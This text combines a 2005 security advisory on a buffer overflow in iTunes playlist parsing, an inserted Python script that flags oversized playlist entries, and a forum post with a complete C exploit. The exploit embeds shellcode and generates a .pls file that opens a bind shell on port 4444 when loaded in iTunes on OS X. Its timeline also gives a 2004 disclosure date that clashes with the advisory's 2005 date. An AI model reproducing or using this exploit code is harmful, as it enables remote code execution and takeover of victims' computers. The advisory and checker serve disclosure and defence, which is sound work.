Apple iTunes Playlist Parsing Buffer Overflow Vulnerability

iDEFENSE Security Advisory 01.13.05:
http://www.idefense.com/application/poi/display?type=vulnerabilities
January 13, 2005

I. BACKGROUND

Apple iTunes is a digital jukebox capable of playing a variety of sound file formats, sharing music and burning music CDs. More information about iTunes is available from: http://www.apple.com/itunes/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Apple Computer Inc.'s iTunes music player allows attackers to execute arbitrary code.

The problem specifically exists when parsing playlist files that contain long URL file entries. Malicious playlist files can come with either the .m3u or .pls extension. Though their formats are different, the vulnerability in each is the same.

An example malicious .pls file with a long URL:

    [playlist]
    NumberOfEntries=1
    File1=http://[A x 3045]1234

An example malicious .m3u file with a long URL:

    http://[A x 3045]1234

In both cases '[A x 3045]' represents any string of 3,045 bytes in length. Opening either malicious playlist file on the Microsoft Windows platform will cause iTunes to crash with an access violation when attempting to execute instruction 0x34333231, which is the little-endian ASCII code representation of '1234'. An attacker can exploit this vulnerability to redirect the flow of control and eventually execute arbitrary code. While this example is specific to the Microsoft Windows platform, exploitation on the Apple Mac OS platform is also possible.

III. ANALYSIS

Exploitation of the described vulnerability allows remote attackers to execute arbitrary code under the context of the user who started iTunes. Exploitation requires that an attacker convince a target user to open a malicious playlist file with a vulnerable version of iTunes.

IV. DETECTION

iTunes 4.7 as installed on the Microsoft Windows and Apple Mac OS platforms are affected. Earlier versions may also be susceptible.

V. WORKAROUND

Do not open playlist files from untrusted sources. Inspect the contents of .m3u and .pls playlist files for long URL file names prior to opening them with iTunes.

VI. VENDOR RESPONSE

This vulnerability is addressed in iTunes 4.7.1.

iTunes 4.7.1 may be obtained from the Software Update pane in System Preferences, or Apple's iTunes download site: http://www.apple.com/itunes/download/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the names CAN-2005-0043 to these issues. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

12/17/2004 Initial vendor notification
12/17/2004 Initial vendor response
01/13/2004 Public disclosure

IX. CREDIT

Sean de Regge (seanderegge[at]hotmail.com) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
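One way to carry out the inspection step from the workaround in section V, as an added example that is not part of the iDEFENSE advisory or of any Apple software: a small Python checker that parses both playlist formats the advisory names (the FileN= keys of a .pls file, the non-comment lines of an .m3u file) and reports every entry whose URL or path exceeds a length limit. The limit MAX_ENTRY_LEN is a value chosen here, well below the 3,045-byte entry the advisory describes, and the sample playlists at the bottom are constructed for the demonstration.

```python
"""Flag oversized URL entries in .m3u / .pls playlists before a media player sees them.

Added example for the advisory's workaround; MAX_ENTRY_LEN is an assumed limit,
not a value from the advisory.
"""
import re
import sys

# The advisory's trigger is a 3,045-byte URL; anything near that is suspect,
# so the limit is deliberately set much lower (assumed value, tune as needed).
MAX_ENTRY_LEN = 1024

# .pls entries look like "File1=http://host/stream"; keys are case-insensitive.
_PLS_FILE_KEY = re.compile(r"^\s*file\d+\s*=\s*(.*)$", re.IGNORECASE)


def pls_entries(text):
    """Yield (line_number, value) for every FileN= key in a .pls playlist."""
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = _PLS_FILE_KEY.match(line)
        if match:
            yield lineno, match.group(1).strip()


def m3u_entries(text):
    """Yield (line_number, value) for every non-empty, non-comment .m3u line.

    Lines starting with '#' are directives/comments (#EXTM3U, #EXTINF, ...)."""
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            yield lineno, stripped


def scan_playlist(name, text, limit=MAX_ENTRY_LEN):
    """Return [(line_number, entry_length_in_bytes)] for entries longer than `limit`.

    The format is chosen from the file extension of `name`."""
    ext = name.lower().rsplit(".", 1)[-1]
    if ext == "pls":
        entries = pls_entries(text)
    elif ext in ("m3u", "m3u8"):
        entries = m3u_entries(text)
    else:
        raise ValueError(f"unsupported playlist type: {name}")
    findings = []
    for lineno, value in entries:
        length = len(value.encode("utf-8"))
        if length > limit:
            findings.append((lineno, length))
    return findings


# Constructed sample inputs (not real files): one benign .pls, and a .pls and an
# .m3u shaped like the advisory's examples ('[A x 3045]' followed by '1234').
BENIGN_PLS = (
    "[playlist]\n"
    "NumberOfEntries=2\n"
    "File1=http://radio.example/stream.mp3\n"
    "Title1=Example stream\n"
    "File2=tracks/song.mp3\n"
    "Version=2\n"
)
OVERSIZED_PLS = "[playlist]\nNumberOfEntries=1\nFile1=http://" + "A" * 3045 + "1234\n"
OVERSIZED_M3U = "#EXTM3U\n#EXTINF:-1,stream\nhttp://" + "A" * 3045 + "1234\n"


def main(argv):
    """Scan the playlist files named on the command line; exit 1 if any entry is oversized."""
    bad = False
    for path in argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = scan_playlist(path, fh.read())
        for lineno, length in findings:
            print(f"{path}:{lineno}: entry is {length} bytes (limit {MAX_ENTRY_LEN})")
            bad = True
    return 1 if bad else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The length is measured in encoded bytes rather than characters, since the overflow is about the byte count handed to the parser; a benign playlist yields an empty list, while both constructed samples report their third line at 3,056 bytes (7 for "http://", 3,045 filler bytes, 4 for "1234").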
Hey Everyone,

I've written a proof of concept for the iTunes 4.7 advisory released by iDefense on January 13, 2005.

Here is some code to exploit the vulnerability; it will generate a *.pls file which, when opened with iTunes 4.7, will bind a shell on port 4444.

- nemo

<------------------ fm-eyetewnz.c -------------------------->

/*
 * PoC for iTunes on OS X 10.3.7
 * -( nemo@felinemenace.org )-
 *
 * Generates a .pls file, when loaded in iTunes it
 * binds a shell to port 4444.
 * Shellcode contains no \x00 or \x0a's.
 *
 * sample output:
 *
 * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
 * -( fm-eyetewnz )-
 * -( nemo@felinemenace.org )-
 * Creating file: foo.pls.
 * Bindshell on port: 4444
 * -[nemo@gir:~]$ open foo.pls
 * -[nemo@gir:~]$ nc localhost 4444
 * id
 * uid=501(nemo) gid=501(nemo) groups=501(nemo)
 *
 * Thanks to andrewg, mercy and core.
 * Greetings to pulltheplug and felinemenace.
 *
 * -( need a challenge? )-
 * -( http://pulltheplug.org )-
 */

#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* memset() */
#include <strings.h>  /* bcopy() */

/* total length of the oversized URL written after "File1=http://" */
#define BUFSIZE (1598 + 4)

char shellcode[] =
/* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";

int main(int ac, char **av)
{
    int *p;
    unsigned char *q;
    char buf[BUFSIZE];
    FILE *pls;
    int offset = 0x3DA8;
    char playlist[] = {
        "[playlist]\n"
        "NumberOfEntries=1\n"
        "File1=http://"
    };

    printf("-( fm-eyetewnz )-\n");
    printf("-( nemo@felinemenace.org )-\n");

    /* fill the URL with 0x60 bytes and place the shellcode near its end */
    memset(buf, '\x60', BUFSIZE);
    bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)), sizeof(shellcode) - 1);

    // avoid mangled stack.
    q = (unsigned char *)buf + sizeof(buf) - 5;
    p = (int *)q;

    if (!(av[1])) {
        printf("usage: %s <filename (.pls)> [offset]\n", *av);
        exit(1);
    }
    if (av[2])
        offset = atoi(av[2]);

    /* the last four bytes of the URL become the new return address
       (the position the advisory's '1234' occupies) */
    *p = (0xc0000000 - offset);  // 0xbfffc258;

    if (!(pls = fopen(*(av + 1), "w+"))) {
        printf("error opening file: %s.\n", *(av + 1));
        exit(1);
    }
    printf("Creating file: %s.\n", *(av + 1));
    printf("Bindshell on port: 4444\n");

    fwrite(playlist, sizeof(playlist) - 1, 1, pls);
    fwrite(buf, sizeof(buf) - 1, 1, pls);
    fclose(pls);
    return 0;
}